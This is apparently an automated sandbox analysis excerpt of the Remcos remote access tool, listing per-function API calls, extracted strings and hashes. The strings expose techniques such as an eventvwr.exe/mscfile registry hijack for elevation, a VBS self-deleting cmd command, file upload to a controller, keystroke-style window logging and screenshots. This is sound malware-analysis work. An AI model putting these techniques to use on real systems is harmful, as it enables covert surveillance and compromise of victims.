                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00407D57
                                • __aulldiv.LIBCMT ref: 00407D89
                                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00407EAC
                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407EC7
                                • CloseHandle.KERNEL32(00000000), ref: 00407FA0
                                • CloseHandle.KERNEL32(00000000,00000052), ref: 00407FEA
                                • CloseHandle.KERNEL32(00000000), ref: 00408038
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                • API String ID: 3086580692-2596673759
                                • Opcode ID: 3628a73cbb86b5736265ac293d311146e85fdcb2316ed178213f0337e0fbe7ae
                                • Instruction ID: 8e1224200a6c450cfdafa1dd663dcbd78fa1a86951e699dbe30fbedc525f5c9c
                                • Opcode Fuzzy Hash: 3628a73cbb86b5736265ac293d311146e85fdcb2316ed178213f0337e0fbe7ae
                                • Instruction Fuzzy Hash: 05B191316083409BC354FB65C891AAFB7E9AFD4314F40492FF489622D2EF789D458B8B
                                Function 0040C3B8 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                                  • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                                  • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                                  • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                                  • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C412
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C571
                                • ExitProcess.KERNEL32 ref: 0040C57D
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$Temp$exepath$open
                                • API String ID: 1913171305-2600661426
                                • Opcode ID: c86d61277acc14c68f24433c0b654e0e29c296f6a8d4ad8667fc6f6870691cc8
                                • Instruction ID: b2ba4f5629099335deb4bd311fc34f74cd7c7cff7cc2b9b794c872af44b42b62
                                • Opcode Fuzzy Hash: c86d61277acc14c68f24433c0b654e0e29c296f6a8d4ad8667fc6f6870691cc8
                                • Instruction Fuzzy Hash: 214132319001185ACB14FBA2DC96DEE7778AF50708F50017FF506B71E2EE785E4ACA99
                                Function 004048A8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                Download Yara Rule
                                APIs
                                • connect.WS2_32(?,?,?), ref: 004048C0
                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0
                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049EE
                                • WSAGetLastError.WS2_32 ref: 00404A01
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                • API String ID: 994465650-2151626615
                                • Opcode ID: b56ab407b7d85cc5e8983cef37c9724a1f5c45cc3ea0a996f87df1f4b9ef746f
                                • Instruction ID: f1749a2af40dec866484330b2464a30bcc7489b9f615ba144f2b3c776ade1d80
                                • Opcode Fuzzy Hash: b56ab407b7d85cc5e8983cef37c9724a1f5c45cc3ea0a996f87df1f4b9ef746f
                                • Instruction Fuzzy Hash: 37412AB5B406017BD608777A8E1B96E7625AB81304B50017FF901136D2EBBD9C2197DF
                                Function 00452DBB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00452A89: CreateFileW.KERNEL32(?,00000008,00000007,d.E,?,?,00000000,?,00452E64,00000000,0000000C), ref: 00452AA6
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452ECF
                                • __dosmaperr.LIBCMT ref: 00452ED6
                                • GetFileType.KERNEL32(00000000), ref: 00452EE2
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452EEC
                                • __dosmaperr.LIBCMT ref: 00452EF5
                                • CloseHandle.KERNEL32(00000000), ref: 00452F15
                                • CloseHandle.KERNEL32(00000000), ref: 0045305F
                                • GetLastError.KERNEL32 ref: 00453091
                                • __dosmaperr.LIBCMT ref: 00453098
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                • String ID: H
                                • API String ID: 4237864984-2852464175
                                • Opcode ID: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
                                • Instruction ID: def4621c7e831d5678052e1043e56ea9e2bfce8be848437acb5cac56d61a7e39
                                • Opcode Fuzzy Hash: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
                                • Instruction Fuzzy Hash: CAA15832A101049FDF19EF68D8417AE7BB1AB0A325F14015FFC419B392DB798D1ACB5A
                                Function 00413606 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 65535$udp
                                • API String ID: 0-1267037602
                                • Opcode ID: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                                • Instruction ID: 74e44cdacc71272d4b4fe4479ff5a2c38cc960f39e0e81ce023821ae7ff597b0
                                • Opcode Fuzzy Hash: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                                • Instruction Fuzzy Hash: 3151F1F5209302ABD7209E15C809BBB77D4AB84B52F08842FF8A1973D0D76CDEC0965E
                                Function 00409C1F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                Download Yara Rule
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 00409C81
                                • Sleep.KERNEL32(000001F4), ref: 00409C8C
                                • GetForegroundWindow.USER32 ref: 00409C92
                                • GetWindowTextLengthW.USER32(00000000), ref: 00409C9B
                                • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 00409CCF
                                • Sleep.KERNEL32(000003E8), ref: 00409D9D
                                  • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                • String ID: [${ User has been idle for $ minutes }$]
                                • API String ID: 911427763-3954389425
                                • Opcode ID: a44f1e588b244d76f3851291f59a3d8a0f12b55ab3dd92a15c41ef104020a1a6
                                • Instruction ID: 7a62ae1493acfbf190be1d0992f15f5c774c3bdccfea44e4f2dca48363f02a21
                                • Opcode Fuzzy Hash: a44f1e588b244d76f3851291f59a3d8a0f12b55ab3dd92a15c41ef104020a1a6
                                • Instruction Fuzzy Hash: 7C5193716043405BD304FB61D855A6EB795AF84308F50093FF486A62E3DF7CAE45C69A
                                Function 0040C5ED Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                Download Yara Rule
                                APIs
                                • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040C753
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: LongNamePath
                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                • API String ID: 82841172-425784914
                                • Opcode ID: 611eacb1f2b12eabfa35ce51232d41e6553fe8371d81c53e9ab5b340c3cd037e
                                • Instruction ID: e0747f7f0ded3e76473395fd4b63a7f1dfd4675be44f898a7a0c8db3d1efc66a
                                • Opcode Fuzzy Hash: 611eacb1f2b12eabfa35ce51232d41e6553fe8371d81c53e9ab5b340c3cd037e
                                • Instruction Fuzzy Hash: EB4168315042419AC204FB62DC929EFB7E8AEA4759F10063FF541720E2EF799E49C99F
                                Function 0044DC05 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 204COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: pF$tF
                                • API String ID: 269201875-2954683558
                                • Opcode ID: fb15eab2332ee79fe3b6269c7a6798f30c580aa4b0380318a35312f844840a90
                                • Instruction ID: 6443803da38cddfc03973e112e1470be20db66c409a4168417c9ccfa39c85508
                                • Opcode Fuzzy Hash: fb15eab2332ee79fe3b6269c7a6798f30c580aa4b0380318a35312f844840a90
                                • Instruction Fuzzy Hash: 1261D5B5D00205AFEB20CF69C841BAABBF4EF05B14F15416BE944EB381E7749D41DB58
                                Function 0040971E Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 163sleepCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNEL32(00001388), ref: 00409738
                                  • Part of subcall function 0040966D: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                                  • Part of subcall function 0040966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                                  • Part of subcall function 0040966D: Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                                  • Part of subcall function 0040966D: CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409774
                                • GetFileAttributesW.KERNEL32(00000000), ref: 00409785
                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040979C
                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409816
                                  • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00469654,00000000,00000000,00000000), ref: 0040991F
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                • String ID: 05Mw`Mw$H"G$H"G
                                • API String ID: 3795512280-1384184782
                                • Opcode ID: 671ef836078558126b4631db4dc3394edfc305a4d04f8952e6c39a6f844ac237
                                • Instruction ID: 85d6828eff9e87111454ffe40de9a07a949f8ec8799fb43d86416e8e02d17308
                                • Opcode Fuzzy Hash: 671ef836078558126b4631db4dc3394edfc305a4d04f8952e6c39a6f844ac237
                                • Instruction Fuzzy Hash: 9D513D712043015BCB14BB72C9A6ABF76999F90308F00453FB946B72E3DF7D9D09869A
                                Function 00405480 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • SetEvent.KERNEL32(?,?), ref: 0040549F
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040554F
                                • TranslateMessage.USER32(?), ref: 0040555E
                                • DispatchMessageA.USER32(?), ref: 00405569
                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00471F10), ref: 00405621
                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659
                                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                • String ID: CloseChat$DisplayMessage$GetMessage
                                • API String ID: 2956720200-749203953
                                • Opcode ID: f61965f1cc9c9e7f95a47c597eceb50cc1da7838f2ae86f95f0e5e0772039054
                                • Instruction ID: 0f013d79663c92f7c21c274702d2b8200e9ba5951f20e13ff122dbd33ecc2bba
                                • Opcode Fuzzy Hash: f61965f1cc9c9e7f95a47c597eceb50cc1da7838f2ae86f95f0e5e0772039054
                                • Instruction Fuzzy Hash: 8B41C471A043016BCB00FB75DC5A86F77A9EB85714B40093EF946A31D2EF79C905CB9A
                                Function 0041601D Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0041626A: __EH_prolog.LIBCMT ref: 0041626F
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00463050), ref: 0041611A
                                • CloseHandle.KERNEL32(00000000), ref: 00416123
                                • DeleteFileA.KERNEL32(00000000), ref: 00416132
                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004160E6
                                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                • String ID: <$@$@%G$@%G$Temp
                                • API String ID: 1704390241-4139030828
                                • Opcode ID: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
                                • Instruction ID: 980de7e6e99344695fa922fac5fad97fc57b46ec9d0f9c422bd6bd0d3fbbc04a
                                • Opcode Fuzzy Hash: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
                                • Instruction Fuzzy Hash: 48419131900209ABDB14FB61DC56AEEB739AF50308F50417EF505760E2EF785E8ACB99
                                Function 00418AC3 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041843C,00000000), ref: 00418AD2
                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041843C,00000000), ref: 00418AE9
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418AF6
                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041843C,00000000), ref: 00418B05
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B16
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B19
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
                                • Instruction ID: 27c4ffebcf7932a5624e60d5a3802e7503a1161fac6a42b5cc64803f4be6ae02
                                • Opcode Fuzzy Hash: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
                                • Instruction Fuzzy Hash: A211E9715002186FD610EF64DC89CFF3B6CDF41B96741012AFA0593192DF789D469AF5
                                Function 00445631 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 00445645
                                  • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                  • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                • _free.LIBCMT ref: 00445651
                                • _free.LIBCMT ref: 0044565C
                                • _free.LIBCMT ref: 00445667
                                • _free.LIBCMT ref: 00445672
                                • _free.LIBCMT ref: 0044567D
                                • _free.LIBCMT ref: 00445688
                                • _free.LIBCMT ref: 00445693
                                • _free.LIBCMT ref: 0044569E
                                • _free.LIBCMT ref: 004456AC
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                • Instruction ID: 08dc7793ba969bb8ae61e50cce6790fa76a3b05f45cdd3d63b195ce4761959f1
                                • Opcode Fuzzy Hash: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                • Instruction Fuzzy Hash: A511CB7610010CBFDB01EF55C986CDD3B65FF04759B4284AAFA885F222EA35DF509B88
                                Function 00417F6A Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00417F6F
                                • GdiplusStartup.GDIPLUS(00471668,?,00000000), ref: 00417FA1
                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041802D
                                • Sleep.KERNEL32(000003E8), ref: 004180B3
                                • GetLocalTime.KERNEL32(?), ref: 004180BB
                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 004181AA
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                • API String ID: 489098229-3790400642
                                • Opcode ID: 27953ccb73c7935c50ce76e498ac53549bd0f641fbc99231dbf637836dbf8ac1
                                • Instruction ID: ff50de85f816598f14f139fcbfe24147e98e2bb745fd097185ef2e944e73ca26
                                • Opcode Fuzzy Hash: 27953ccb73c7935c50ce76e498ac53549bd0f641fbc99231dbf637836dbf8ac1
                                • Instruction Fuzzy Hash: 98516071A001549BCB04BBB5C8529FD76A8AF55308F04403FF805A71E2EF7C5E85C799
                                Function 004530E4 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004541DF), ref: 00453107
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: DecodePointer
                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                • API String ID: 3527080286-3064271455
                                • Opcode ID: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                                • Instruction ID: 9333e61b372fbf41addd7e909d3efe481a8fa84217f9852f3907f1ba123c2b47
                                • Opcode Fuzzy Hash: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                                • Instruction Fuzzy Hash: CC518F30900909DBCF10DFA8E9480ADBBB0FF0A347F644196EC81A7216CB799A1DDB1D
                                Function 004159BA Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                Download Yara Rule
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00415A1A
                                  • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                • Sleep.KERNEL32(00000064), ref: 00415A46
                                • DeleteFileW.KERNEL32(00000000), ref: 00415A7A
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CreateDeleteExecuteShellSleep
                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                • API String ID: 1462127192-2001430897
                                • Opcode ID: c216d361bb9ef99ebd7f865ddf1f7fdade912dea526e25dca7a569b2ba1e0d71
                                • Instruction ID: 7fbd65b43d39327dc9f625a99f058064c4c6325298edc9245ab65683dcac2845
                                • Opcode Fuzzy Hash: c216d361bb9ef99ebd7f865ddf1f7fdade912dea526e25dca7a569b2ba1e0d71
                                • Instruction Fuzzy Hash: FA315E719402199ACB04FBA1DC96DEE7768EF50308F40017FF506731E2EE785E8ACA99
                                Function 004066A6 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 78COMMON
                                Download Yara Rule
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 00406775
                                • ExitProcess.KERNEL32 ref: 00406782
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteExitProcessShell
                                • String ID: H"G$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                • API String ID: 1124553745-1488154373
                                • Opcode ID: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
                                • Instruction ID: 062031feec86e4e4641db6525c6f69cb17b792298443eef288e26788f9a4eac4
                                • Opcode Fuzzy Hash: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
                                • Instruction Fuzzy Hash: 36110571A4420166D704B7A2DC57FEF32689B10B09F50003FF906B61D2EEBC5A4982DE
                                Function 0041AA4F Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 53memoryCOMMON
                                Download Yara Rule
                                APIs
                                • AllocConsole.KERNEL32(00000001), ref: 0041AA5D
                                • ShowWindow.USER32(00000000,00000000), ref: 0041AA76
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocConsoleShowWindow
                                • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
                                • API String ID: 4118500197-4025029772
                                • Opcode ID: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                                • Instruction ID: 07661f9972e693547954b0fc743ee20e91627884e026026f5b86345d1a8b50cd
                                • Opcode Fuzzy Hash: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                                • Instruction Fuzzy Hash: CE015271D803586ADB10EBF59C06FDF77AC6B18708F54142BB100A7095E7FC950C4A2D
                                Function 0041B212 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041B22B
                                  • Part of subcall function 0041B2C4: RegisterClassExA.USER32(00000030), ref: 0041B310
                                  • Part of subcall function 0041B2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                                  • Part of subcall function 0041B2C4: GetLastError.KERNEL32 ref: 0041B335
                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041B262
                                • lstrcpynA.KERNEL32(00471AF8,Remcos,00000080), ref: 0041B27C
                                • Shell_NotifyIconA.SHELL32(00000000,00471AE0), ref: 0041B292
                                • TranslateMessage.USER32(?), ref: 0041B29E
                                • DispatchMessageA.USER32(?), ref: 0041B2A8
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041B2B5
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                • String ID: Remcos
                                • API String ID: 1970332568-165870891
                                • Opcode ID: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                                • Instruction ID: 392c2ce23d615fe7cfca65c1bdf78dc563e79c4ff08160ae13be93183ad442b8
                                • Opcode Fuzzy Hash: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                                • Instruction Fuzzy Hash: CD013971901308ABCB10DBB9ED4EEDB7BBCFB85B05F40417AF51992061D7B89489CB68
                                Function 00449F63 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d7410a98b278d9d25d0fcdc47fb7c960ad5f7d9b58d6d06d1c87314e37a5ed65
                                • Instruction ID: 53180985ac70b1d9c95f382170f9691aec8243d5c40cf1d2be039b65846bfc46
                                • Opcode Fuzzy Hash: d7410a98b278d9d25d0fcdc47fb7c960ad5f7d9b58d6d06d1c87314e37a5ed65
                                • Instruction Fuzzy Hash: 2DC12970D44245AFEB11DFA8D841BEEBBB0BF19304F04419AE844A7392C7798D51DB6B
